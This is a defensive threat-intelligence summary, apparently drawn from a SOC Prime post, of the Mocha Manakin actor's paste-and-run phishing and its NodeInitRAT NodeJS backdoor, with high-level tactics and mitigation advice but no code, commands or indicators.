Full Report
Mocha Manakin, believed to have ties to Interlock ransomware operations, has been observed using the paste-and-run phishing technique for initial access since at least January 2025. Adversaries deploy a custom NodeJS backdoor, dubbed NodeInitRAT, which enables persistence, reconnaissance, command execution, and payload delivery via HTTP, along with other offensive operations that can potentially lead to […] The post Mocha Manakin Attack Detection: Hackers Spread a Custom NodeJS Backdoor Dubbed NodeInitRAT Using the Paste-and-Run Technique appeared first on SOC Prime.
Analysis Summary
# Threat Actor: Mocha Manakin
## Attribution & Identity
The threat actor group is referred to as **Mocha Manakin**. The activity discussed involves the use of a custom NodeJS backdoor named **NodeInitRAT**. There is an implied link or shared characteristics between Mocha Manakin/NodeInitRAT and **Interlock ransomware activity**.
## Activity Summary
Mocha Manakin is observed employing a "paste-and-run" technique leveraging the custom **NodeInitRAT** backdoor written in NodeJS. Attacks involve initial access, followed by communication over HTTP to a command-and-control (C2) server. The actor executes arbitrary commands to perform network reconnaissance, specifically targeting domain controllers, trusts, administrative shares, and Service Principal Names (SPNs). Following enumeration, the attacker deploys secondary payloads, including EXE, DLL, and JS files.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Utilizes a "paste-and-run" technique for script execution.
- **Command and Control (C2):** Communicates with C2 servers over **HTTP**.
- **Defense Evasion/Execution:** Obfuscates data transfers using **XOR encoding and GZIP compression**.
- **Discovery:** Executes commands to enumerate domain controllers, trusts, admins, and SPNs.
- **Persistence/Lateral Movement:** Deploys additional payloads (EXE, DLL, JS).
- *No specific MITRE ATT&CK IDs were explicitly mentioned in the provided text.*
## Targeting
- Sectors: Not explicitly detailed, but the focus on domain controllers and trusts suggests targeting of enterprise networks.
- Geography: Not specified.
- Victims: Specific organizations were not mentioned.
## Tools & Infrastructure
- **Malware families used:**
- **NodeInitRAT** (Custom NodeJS Backdoor)
- **Infrastructure (C2, domains, IPs - defang URLs):**
- C2 communications occur over **HTTP**.
- Specific C2 domains/IPs are not listed, only that defenders should monitor/block them.
## Implications
The use of the NodeInitRAT backdoor via the "paste-and-run" method presents challenges for defenders, indicating a focus on rapid, direct script execution. The observed activity (enumeration of AD components) suggests high-value objectives, potentially leading to privilege escalation or ransomware deployment, supported by the noted characteristics shared with Interlock ransomware operations.
## Mitigations
- **Endpoint Defense:**
- Terminate any suspicious `_node.exe_` processes.
- Delete associated payloads (DLLs, etc.).
- Remove persistence mechanisms deployed by the actor.
- **System Configuration:**
- Disable Windows hotkeys (e.g., Windows+R/X) via Group Policy to block quick script execution, though this may impact user workflows.
- **Network Defense:**
- Block or sinkhole any C2 domains and IPs associated with NodeInitRAT.
- Monitor DNS and traffic logs for indicators of compromise related to the actor's communication patterns.